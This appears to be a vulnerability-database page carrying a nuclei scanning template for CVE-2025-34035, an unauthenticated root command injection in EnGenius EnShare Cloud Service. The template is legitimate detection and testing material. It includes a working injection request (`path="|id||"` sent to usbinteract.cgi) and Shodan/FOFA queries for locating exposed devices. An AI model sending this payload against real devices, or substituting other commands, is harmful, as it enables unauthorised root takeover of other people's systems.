Lucene search
K

EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

EnShare Cloud Service 1.4.11 injection in usbinteract.cgi yields unauthenticated remote root exec

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-34035
24 Jun 202501:35
circl
CNNVD
EnGenius EnShare Cloud Service 操作系统命令注入漏洞
24 Jun 202500:00
cnnvd
CVE
CVE-2025-34035
24 Jun 202501:00
cve
Cvelist
CVE-2025-34035 EnGenius EnShare IoT Gigabit Cloud Service Command Injection
24 Jun 202501:00
cvelist
EUVD
EUVD-2025-18966
24 Jun 202501:00
euvd
NVD
CVE-2025-34035
24 Jun 202501:15
nvd
OSV
CVE-2025-34035
24 Jun 202501:15
osv
Positive Technologies
PT-2025-26662
24 Jun 202500:00
ptsecurity
RedhatCVE
CVE-2025-34035
26 Jun 202503:12
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-34035
23 Jun 202500:00
vulncheck_kev
Rows per page
id: CVE-2025-34035

info:
  name: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
  author: intelligent-ears
  severity: critical
  description: |
    An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier.The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands.The injected commands are executed with root privileges, leading to full system compromise.
  impact: |
    Unauthenticated attackers can inject and execute arbitrary shell commands with root privileges through the path parameter in usbinteract.cgi, achieving complete system compromise.
  remediation: |
    Upgrade EnGenius EnShare Cloud Service to version 1.4.12 or later that properly sanitizes user input in CGI scripts.
  reference:
    - https://cxsecurity.com/issue/WLB-2017060050
    - https://www.exploit-db.com/exploits/42114
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34035
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 10.0
    cve-id: CVE-2025-34035
    epss-score: 0.12334
    epss-percentile: 0.95702
    cwe-id: CWE-78
  metadata:
    verified: true
    shodan-query: html:"/web/cgi-bin/usbinfo.cgi"
    fofa-query: body="/web/cgi-bin/usbinfo.cgi"
    max-request: 1
  tags: cve,cve2025,engenius,enshare,rce,vkev,vuln

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=7&path="|id||"

    payloads:
      path:
        - "/web/cgi-bin/usbinteract.cgi"
        - "/cgi-bin/usbinteract.cgi"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('uid=([0-9(a-z_)]+) gid=([0-9(a-z_)]+)', body)"
          - 'contains(body, "Content-type: text/html")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100f5a68d0c84dc0a23f689f9b7c1239c205ec4b3bcd0123b84d5d15e587a4a723d022100ba69be855348f945059487beb56ef1626bb7ea5b2473a59501a9ce833800e44d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
CVSS 410
EPSS0.12334
SSVC
13